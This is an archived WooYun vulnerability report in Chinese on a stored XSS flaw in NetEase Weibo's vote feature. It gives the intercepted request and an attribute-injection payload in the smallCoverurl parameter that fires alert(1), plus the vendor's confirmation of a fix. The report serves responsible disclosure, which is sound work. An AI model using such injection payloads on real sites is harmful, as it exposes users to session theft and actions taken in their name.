当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012762

漏洞标题:网易微博存储型XSS 2

相关厂商:网易

漏洞作者: 心伤的胖子

提交时间:2012-09-27 09:43

修复时间:2012-11-11 09:44

公开时间:2012-11-11 09:44

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-27: 细节已通知厂商并且等待厂商处理中
2012-09-28: 厂商已经确认,细节仅向厂商公开
2012-10-08: 细节向核心白帽子及相关领域专家公开
2012-10-18: 细节向普通白帽子公开
2012-10-28: 细节向实习白帽子公开
2012-11-11: 细节向公众公开

简要描述:

有人在等2,那么这就来了。
在《网易微博存储型XSS 1》 http://www.wooyun.org/bugs/wooyun-2010-012746 中漏洞虽然是发微博处,还是需要一个小的交互才能够触发漏洞(不过绝大多数人都会有这个交互的)。
在这个网易微博的漏洞中不需要交互,看到微博就会触发xss漏洞。

详细说明:

1、首先说下漏洞是出现在创建投票处
2、在创建投票的地方可以上传图片,容易出现xss的地方,我们上传一个图片,同时把投票的其他项也补充好,提交的时候截断请求,会向服务端发送如下数据

title=%E9%92%93%E9%B1%BC%E5%B2%9B&description=&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&voteType=1&endTime=&coverurl=http%3A%2F%2F126.fm%2F2bqmHT&smallCoverurl=http%3A%2F%2Ftimge4.126.net%2Fimage%3Fw%3D322%26h%3D115%26url%3Dhttp%253A%252F%252F126.fm%252F2bqmHT%26gif%3D1%26quality%3D85


在实际测试中我在每个参数后面都加上类似"><bbb>这样的字符,创建投票,然后发表微博
3、访问刚才发表的微博,然后在源码中搜索 <bbb> 这样的字符,很不幸真的有,出现在img标签后面,由于是在首页访问,大致判断是smallCoverurl这个参数没有过滤好。
4、从新创建一个投票然后提交,如下:

title=%E9%92%93%E9%B1%BC%E5%B2%9B&description=&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&voteType=1&endTime=&coverurl=http%3A%2F%2F126.fm%2F2bqmHT&smallCoverurl=http%3A%2F%2Ftimge4.126.net%2Fimage%3Fw%3D322%26h%3D115%26url%3Dhttp%253A%252F%252F126.fm%252F2bqmHT%26gif%3D1%26quality%3D85" onload=alert(1) a="


5、再次访问新发表的微博,顺利执行我们的alert(1)。

漏洞证明:

下图:


或者访问:
http://t.163.com/0086269676

修复方案:

1、对coverurl和smallCoverurl参数进行编码处理,虽然我没有测试coverurl这个参数,但是我觉得应该也存在问题。

版权声明:转载请注明来源 心伤的胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-09-28 18:06

厂商回复:

感谢您对网易的关注,漏洞已经修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-12-14 13:53 | 蓝风 ( 普通白帽子 | Rank:125 漏洞数:25 | 崬汸慾哓 嗼檤焄垳皁 沓猵圊屾亾沬荖 颩憬...)

    授人以渔